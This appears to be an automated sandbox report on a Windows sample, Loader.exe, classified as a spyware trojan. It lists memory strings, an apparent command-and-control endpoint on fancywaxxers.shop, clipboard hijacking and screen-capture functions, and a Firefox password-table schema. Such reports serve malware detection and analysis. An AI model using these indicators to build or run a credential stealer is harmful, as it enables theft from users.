                Source: Loader.exe, 00000003.00000003.2375458875.00000000054EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: Loader.exe, 00000003.00000003.2375458875.00000000054EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: Loader.exe, 00000003.00000003.2375458875.00000000054EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: Loader.exe, 00000003.00000003.2375458875.00000000054EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: Loader.exe, 00000003.00000003.2375458875.00000000054EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: Loader.exe, 00000003.00000003.2375458875.00000000054EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: Loader.exe, 00000003.00000003.2375458875.00000000054EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: Loader.exe, 00000003.00000003.2375458875.00000000054EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: Loader.exe, 00000003.00000003.2338136929.0000000005476000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338047949.0000000005479000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338265875.0000000005476000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: Loader.exe, 00000003.00000003.2377096908.00000000054B6000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2377209536.00000000054B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                Source: Loader.exe, 00000003.00000003.2377096908.00000000054B6000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2377209536.00000000054B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                Source: Loader.exe, 00000003.00000003.2338136929.0000000005476000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338047949.0000000005479000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338265875.0000000005476000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Loader.exe, 00000003.00000003.2338136929.0000000005476000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338047949.0000000005479000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338265875.0000000005476000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Loader.exe, 00000003.00000003.2338136929.0000000005476000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338047949.0000000005479000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338265875.0000000005476000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Loader.exe, 00000003.00000003.2377096908.00000000054B6000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2377209536.00000000054B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: Loader.exe, 00000003.00000003.2377096908.00000000054B6000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2377209536.00000000054B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                Source: Loader.exe, 00000003.00000003.2338136929.0000000005476000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338047949.0000000005479000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338265875.0000000005476000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Loader.exe, 00000003.00000003.2338136929.0000000005476000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338047949.0000000005479000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338265875.0000000005476000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Loader.exe, 00000003.00000003.2338136929.0000000005476000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338047949.0000000005479000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338265875.0000000005476000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Loader.exe, 00000003.00000003.2336916157.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/
                Source: Loader.exe, 00000003.00000003.2416587052.0000000002D55000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2389754813.00000000054C8000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2375611870.0000000002D36000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2352050415.0000000002D55000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2375179400.0000000002D36000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2638669692.0000000002D24000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2336916157.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/api
                Source: Loader.exe, 00000003.00000003.2638750413.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2638726873.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2638570560.0000000002D3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/api$
                Source: Loader.exe, 00000003.00000003.2390068678.0000000002D55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/api-
                Source: Loader.exe, 00000003.00000003.2375109855.00000000054CF000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2374823477.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2374273445.00000000054C6000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2389970754.00000000054C8000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2390049990.00000000054CF000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2389754813.00000000054C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/api1-2
                Source: Loader.exe, 00000003.00000003.2389970754.00000000054C8000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2390049990.00000000054CF000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2389754813.00000000054C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/apiMECn
                Source: Loader.exe, 00000003.00000003.2389754813.00000000054C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/apiNh
                Source: Loader.exe, 00000003.00000003.2375109855.00000000054CF000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2374823477.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2374273445.00000000054C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/apiSd
                Source: Loader.exe, 00000003.00000003.2352050415.0000000002D55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/api_yU
                Source: Loader.exe, 00000003.00000003.2415851140.0000000002D55000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2416587052.0000000002D55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/kqu
                Source: Loader.exe, 00000003.00000003.2390068678.0000000002CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/sl
                Source: Loader.exe, 00000003.00000003.3047232037.0000000002CC3000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2337035887.0000000002CC3000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2421787457.0000000002CC3000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.3277198269.0000000002CC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop:443/api
                Source: Loader.exe, 00000003.00000003.2337035887.0000000002CC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop:443/api.
                Source: Loader.exe, 00000003.00000002.3277198269.0000000002CC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop:443/apiMicrosoft
                Source: Loader.exe, 00000003.00000003.2377209536.00000000054B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: Loader.exe, 00000003.00000003.2376704936.0000000005567000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Loader.exe, 00000003.00000003.2376704936.0000000005567000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Loader.exe, 00000003.00000003.2377096908.00000000054B6000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2377209536.00000000054B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                Source: Loader.exe, 00000003.00000003.2377096908.00000000054B6000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2377209536.00000000054B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                Source: Loader.exe, 00000003.00000003.2338136929.0000000005476000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338047949.0000000005479000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338265875.0000000005476000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: Loader.exe, 00000003.00000003.2338136929.0000000005476000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338047949.0000000005479000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338265875.0000000005476000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: Loader.exe, 00000003.00000003.2376704936.0000000005567000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                Source: Loader.exe, 00000003.00000003.2376704936.0000000005567000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                Source: Loader.exe, 00000003.00000003.2376704936.0000000005567000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: Loader.exe, 00000003.00000003.2376704936.0000000005567000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Loader.exe, 00000003.00000003.2376704936.0000000005567000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: Loader.exe, 00000003.00000003.2376704936.0000000005567000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49781 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49792 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49800 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49815 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49827 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49842 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49858 version: TLS 1.2
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00434280 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_00434280
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_052A1000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,3_2_052A1000
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00434280 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_00434280
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00434460 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,3_2_00434460
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0032C0440_2_0032C044
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0033EA4E0_2_0033EA4E
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_003334000_2_00333400
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_003404C20_2_003404C2
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0032DDA20_2_0032DDA2
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0032969B0_2_0032969B
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0032C0443_2_0032C044
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0033EA4E3_2_0033EA4E
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_003334003_2_00333400
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_003404C23_2_003404C2
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0032DDA23_2_0032DDA2
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0032969B3_2_0032969B
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043D0503_2_0043D050
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042207D3_2_0042207D
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004398003_2_00439800
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004419003_2_00441900
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004119203_2_00411920
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042DA213_2_0042DA21
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00414A9A3_2_00414A9A
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00439B303_2_00439B30
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00426B803_2_00426B80
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00420DD03_2_00420DD0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040CEC73_2_0040CEC7
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00422F703_2_00422F70
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043F73E3_2_0043F73E
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00440FD03_2_00440FD0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040FFD63_2_0040FFD6
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004087B03_2_004087B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004270503_2_00427050
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004400653_2_00440065
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004340603_2_00434060
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004278793_2_00427879
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004188163_2_00418816
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041D0203_2_0041D020
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004228303_2_00422830
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040C8E53_2_0040C8E5
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004408803_2_00440880
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040A8B03_2_0040A8B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004059103_2_00405910
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004169143_2_00416914
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004039203_2_00403920
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041D9203_2_0041D920
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004409203_2_00440920
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040B1323_2_0040B132
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004201303_2_00420130
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004191C03_2_004191C0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004359C53_2_004359C5
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004371FD3_2_004371FD
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004219803_2_00421980
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043D9A03_2_0043D9A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004381AC3_2_004381AC
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004409B03_2_004409B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00438A553_2_00438A55
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00427A6E3_2_00427A6E
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040F27E3_2_0040F27E
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004062003_2_00406200
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00415A053_2_00415A05
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00418A303_2_00418A30
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004392303_2_00439230
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00415A053_2_00415A05
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004042D03_2_004042D0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004162D23_2_004162D2
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00423AE03_2_00423AE0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00429AFE3_2_00429AFE
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041AA813_2_0041AA81
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004262A03_2_004262A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00437AA03_2_00437AA0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004092B03_2_004092B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004412B03_2_004412B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041EB503_2_0041EB50
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00402B703_2_00402B70
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040A3123_2_0040A312
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004183FA3_2_004183FA
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041A3B03_2_0041A3B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00430C5A3_2_00430C5A
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004074703_2_00407470
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00423C703_2_00423C70
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043AC703_2_0043AC70
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00410C793_2_00410C79
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00404C103_2_00404C10
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041D4303_2_0041D430
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004114CB3_2_004114CB
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004354B73_2_004354B7
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041CD403_2_0041CD40
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043ED4D3_2_0043ED4D
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00413D503_2_00413D50
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004415C03_2_004415C0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041BDD03_2_0041BDD0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00429DF03_2_00429DF0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043059D3_2_0043059D
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043AE473_2_0043AE47
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00405E603_2_00405E60
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00423E623_2_00423E62
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043A6603_2_0043A660
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00416E623_2_00416E62
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00418E1C3_2_00418E1C
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042D6D63_2_0042D6D6
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004406803_2_00440680
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004066903_2_00406690
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041A6903_2_0041A690
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004096B03_2_004096B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004407703_2_00440770
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043E7763_2_0043E776
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00402F103_2_00402F10
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004397103_2_00439710
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004237C03_2_004237C0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00438FD03_2_00438FD0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042BFB43_2_0042BFB4
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00417FBC3_2_00417FBC
                Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00413D40 appears 72 times
                Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00329BB0 appears 94 times
                Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00407FD0 appears 51 times
                Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 003366CD appears 34 times
                Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00331CE8 appears 42 times
                Source: Loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Loader.exeStatic PE information: Section: .BSS ZLIB complexity 1.000337734502447
                Source: Loader.exeStatic PE information: Section: .BSS ZLIB complexity 1.000337734502447
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/0@1/1
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00439B30 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,3_2_00439B30
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6604:120:WilError_03
                Source: Loader.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Loader.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Loader.exe, 00000003.00000003.2353227159.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338679196.0000000005447000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2352908808.0000000005443000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: C:\Users\user\Desktop\Loader.exeFile read: C:\Users\user\Desktop\Loader.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
                Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
                Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: mskeyprotect.dllJump to behavior
